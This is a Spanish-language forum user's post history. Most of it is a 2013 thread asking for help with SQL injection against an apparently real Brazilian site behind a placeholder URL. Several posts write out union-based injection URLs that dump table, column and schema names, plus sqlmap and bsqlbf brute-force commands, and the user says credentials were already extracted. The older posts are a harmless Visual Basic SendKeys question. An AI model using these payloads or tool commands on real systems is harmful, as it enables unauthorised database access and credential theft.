elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Re: Probando inyecciones SQL - Columnas ocultas en: 9 Julio 2013, 19:27 pm
Ya he sacado el usuario y la contraseña pero no estoy muy contento... Las he terminado adivinando. Quiero probar a hacerlo por fuerza bruta, por aprender. He probado el sbqlfb pero aun no logro que tire.

BlackM4ster He corrido esto, no se si habra algun error...
Código:
"python sqlmap.py -u http://www.miurl.com.br/vcartas.php?mid=4203 --tables -D safecosmetics"

Søra Si puedes oculta la url de tus mensajes tambien por favor.  :-*

Probando brute force (sin exito aun):
Código:
c:\bsqlbf-v2.1>bsqlbf-v2-1.pl -url http://www.miurl.com.br/vcartas.php?mid=4200 -match "Carta Megalith" -database dbro -sql "select 1"
Creo que el problema puede estar en el match porque la subconsulta que esta haciendo la web devuelve mas de una columna.
2  Seguridad Informática / Bugs y Exploits / Re: Probando inyecciones SQL - Columnas ocultas en: 9 Julio 2013, 16:17 pm
Disculpad, ya esta editado.

BlackM4ster: el sqlmap lo he estado probando pero, no me da nisiquiera el nombre de las tablas, solo el de las BD.

Søra: Esa consulta no funciona porque information_schema.columns no muestra las columnas. Entoces no sirve de nada filtrar :(

Me surje una duda mas: Para probar consultas a ciegas esto seria correcto o debo indicar el nombre del campo y tabla en hexadecimal? No entiendo muy bien cuando hay que hacerlo en hexadecimal y cuando no es necesario. Un saludo y gracias por la ayuda!:
EJEMPLO: http://www.miurl.br/mi.php?mid=-1+UNION+SELECT+1,2,ID,4,5,6,7,8,9+from+usuarios--
3  Seguridad Informática / Bugs y Exploits / Probando inyecciones SQL - Columnas ocultas en: 9 Julio 2013, 02:02 am
Buenas, me estoy documentando sobre inyecciones SQL. He seguido varios manuales, pero llevo todo el dia atascado en un punto. Asique os pongo los pasos que he seguido, y os pido consejo:

He conseguido obtener el nombre de todas las tablas de la BD:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--

Sin embargo la consulta que deberia devolver las columnas solo muestra las columnas por defecto de information_schema:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28column_name%29,6,5,6,7,8,9+from+information_schema.columns--

si compruebo las bases de datos que hay, solo veo information_schema y dbro
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28schema_name%29,database%28%29,5,6,7,8,9+from+information_schema.schemata--

con lo cual deduzco que no tengo permisos para ver la BD mysql. Tambien he estado haciendo consultas a ciegas intentando adivinar las columnas de una tabla pero no ha habido suerte:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28id%29,6,5,6,7,8,9+from+dbro.cartas--

ENTOCES: Mi pregunta es... Puedo conseguir mas informacion de la BD o llegué a un punto muerto?
4  Programación / Programación Visual Basic / Re: SendKeys a una app en fullscreen. en: 28 Septiembre 2007, 15:21 pm
Si eso he oido, de momento lo he testeado en varios juegos online, entre ellos FFXI y va de fabula. A ver si a alguien se le ocurren mas alternativas, que cuantas mas opciones mejor.
5  Programación / Programación Visual Basic / Re: SendKeys a una app en fullscreen. en: 28 Septiembre 2007, 01:14 am
Hace una semanas encontre una solucion a este problema tan comun, a mi me dio buen resultado.

la explicacion completa esta http://forums.cameroncole.com/index.php?showtopic=10063&mode=linear

usando la biblioteca AutoItX3.dll trabajareis directamente con directx, lo cual es bastante mas eficiente a la hora de mandar keys a aplicaciones 3D o juegos.

Para el include:
Código:
Public Declare Sub AU3_Send Lib "AutoItX3" (ByVal lps As String, ByVal nmode As Integer)
Y para el sendkeys:
Código:
AU3_Send("{ENTER}", 0)

Un saludo.
6  Programación / Programación Visual Basic / Re: Sendkeys en fullscreen en: 16 Septiembre 2007, 22:30 pm
Es cierto lo siento, llevaba horas buscando sobre el tema y no se me paso por la cabeza que pudiese haber un hilo creado. De cualquier modo en ese post no se acaba de aclarar un modo de hacerlo, asique si alguien descubrio algo o tiene una idea, aun lo agradezco mucho  :xD
7  Programación / Programación Visual Basic / Sendkeys en fullscreen en: 16 Septiembre 2007, 21:29 pm
El sendkeys de basic siempre me ha funcionado sin problemas, pero hoy he intentado usarlo en un programa a pantalla completa (un juego) y sencillamente no ha pasado nada.

Alguna idea?
Por aqui os dejo el codigo que use de prueba.

Código:
Public Class Form1
    'librerias
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         'Espera 10 secs y pulsa intro 2 veces
         Sleep(10000)
        My.Computer.Keyboard.SendKeys("~", True)
        My.Computer.Keyboard.SendKeys("~", True)
    End Sub

End Class
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines